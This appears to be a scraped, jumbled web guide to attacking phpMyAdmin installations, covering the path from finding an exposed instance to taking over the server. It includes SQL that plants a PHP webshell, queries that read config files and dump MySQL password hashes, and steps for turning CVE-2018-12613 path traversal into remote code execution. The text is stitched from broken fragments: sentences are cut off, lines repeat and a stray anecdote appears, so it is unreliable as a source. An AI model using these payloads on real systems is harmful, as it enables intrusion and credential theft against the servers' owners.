phpMyAdmin is one of the world's most popular MySQL and MariaDB database management tools, typically accessed through a web browser. Its widespread use by developers and system administrators, combined with frequent misconfigurations and historical vulnerabilities, makes it a prime target for attackers. This guide explores the many ways a phpMyAdmin interface can be compromised, moving from the initial discovery of an exposed instance through to full system takeover and privilege escalation.
CREATE TABLE `test` ( `content` TEXT NOT NULL ); INSERT INTO `test` (`content`) VALUES (‘<?php eval($_GET[1]); ?>’);
| Method | Command / Technique | |---|---| | | SELECT load_file(‘/etc/phpmyadmin/config.inc.php’); | | MySQL user table | SELECT user, password FROM mysql.user; | | CMS config files | WordPress ( wp‑config.php ), Joomla ( configuration.php ) | | Environment variables | Via phpinfo() if accessible | phpmyadmin hacktricks
Gaining access to the dashboard is the most direct path to full compromise. Default and Weak Credentials
), Alex was able to execute a small piece of PHP code he had "poisoned" into his session data. From Database to Shell phpMyAdmin is one of the world's most popular
: If the MySQL user has file permissions and you know the absolute webroot path, you can write a PHP webshell directly to the server. Local File Inclusion (LFI) to RCE (CVE-2018-12613)
Inspect your browser storage or HTTP traffic to grab your phpMyAdmin session cookie (e.g., phpMyAdmin=abcdef123456... ). Step 3: Trigger the LFI via Path Traversal CREATE TABLE `test` ( `content` TEXT NOT NULL
If PHP is hardened and system is disabled, try:
There are several methods to transition from database access to a web shell:
Then use the LFI vulnerability (if present) to include the resulting database file.